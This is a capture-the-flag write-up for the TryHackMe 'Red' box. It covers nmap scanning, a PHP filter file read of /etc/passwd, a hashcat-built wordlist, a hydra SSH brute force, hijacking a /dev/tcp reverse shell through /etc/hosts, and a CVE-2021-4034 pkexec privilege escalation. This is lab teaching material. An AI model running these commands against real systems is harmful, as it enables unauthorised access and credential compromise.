THM - Red writeup
Hi,
been a long time since my last post. I have done some easy boxes on TryHackMe. And this is the writeup for one of those boxes I have done: Red
Information Gathering
As always, lets start with nmap. I have my routine in using nmap: First I set the current target ip into a variable
1
2
3
TARGET="TARGET_IP"
# or for fish shell, which I have choose as my default shell
set TARGET TARGET_IP
With this, I always use a default port scan followed by a service scan:
1
nmap -Pn $TARGET -oN ports && nmap -Pn -sC -sV -p $(grep '.*(?=\/tcp)' ports | tr '\n' ',') $TARGET -oN services
I only use -p-
when I’m stuck and desperate.
This scan reveals only two open ports:
- 80 is running a webserver
- 22 running ssh
Website
As this is a CTF, I searched for hidden hints on the website, but couldn’t find any. But one thing got my attention, the url provides a variable:
1
?page=
So I tried some LFI techniques and run feroxbuster but sadly there where no useful outputs.
Then I tried php filters and got some useful outputs.
1
curl http://$TARGET:80/index.php?page=php://filter/resource=/etc/passwd
Now there is our way in!
First flag
I tried nearly everything, to get more information or even a real foothold without luck.
1
2
3
4
/home/blue/.ssh/
/home/red/.ssh/
/etc/crontab
...
But then I found something on blue’s home directory:
Sadly the passlist.txt file was deleted, but the way to build it is well documentated and the .reminder file still persists and is readable.
Now to build our wordlist (yes I tried it with rockyou.txt before, its a waste of time) we have to do the same thing, as red obviously did.
Download the ruleset for hashcat if you miss it on your system: best64.rule
Now run the same command locally:
1
hashcat --stdout .reminder -r ./best64.rule > passlist.txt
With the wordlist used to set the password of blue, we can now try to crack it against ssh.
1
hydra -I -l blue -P ./passlist.txt ssh://$TARGET
It will not take for long to find the password of the user blue:
Now log in via ssh and print out the first flag, which lays in /home/blue directory.
Second flag
While I was searching for an opportunity for lateral movement, my session disconnected…
And there are print outs of the user red. (simulated, for sure)
I checked for SUID, cron jobs and misconfigurations in files, but nothing useful there. And while looking around, “red” kept kicking me out of the shell. Everytime I was kicked out, I had to bruteforce the password of user blue, because it had been changed. And yeah, I already tried to change the password to avoid being kicked out:
Next I looked into the running processes, and couldn’t find any suspicious process running by root, but one running by red:
1
bash -c nohup bash -i >& /dev/tcp/redrules.thm/9001 0>&1 &
Obviously a reverse shell to a specific fqdn. Checking the /etc/hosts
file and it contains the fqdn. I couldn’t figure out where the command lays on the system. Even if I locate the command’s executable, blue may not have the permission to read or execute the command.
After a while, I realized something! Every time when “red” writes a message to us, one of the two running reverse shell instances will be replaced from a new instance of the same reverse shell command:
This means, that there is some cronjob running and it calls the command. Because there are two instances of the reverse shell command, we may have luck and the second command could be used to get a shell as user “red”. In most modern system, if the fqdn resolves to multiple ips and the first ip is busy with an instance of the command, subsequent instances of the same command may attempt to connect to the other ip addresses associated with the fqdn.
Ok, fine. I just need to add my ip into the /etc/hosts
file then. But there is one problem with that, the hosts file can’t be written with texteditor like nano or vi. By using lsattr
it can be seen that the file has append-only
permission. So I had to use some sort of redirection.
1
echo "<MY-IP> redrules.thm" >> /etc/hosts
Running a netcat listener on port 9001, I was able to get a shell as user “red”.
Root flag
The root flag is an easy one, because on user red’s home, there is a .git
directory where an executable called pkexec
lays.
By looking up the version of pkexec on google, there can be seen a vulnerability: CVE-2021-4034
Most of the PoC’s are written in C, but I searched for a python version of the exploit, to avoid the building process, and found one on github: joeammond’s CVE-2021-4034
For this PoC to work, I had to change the last line, which is referring to the pkexec location. After that, just upload it to the target with a python http server open.
1
python -m http.server 9090
Now as root the root flag can be printed out easely…
Good luck :)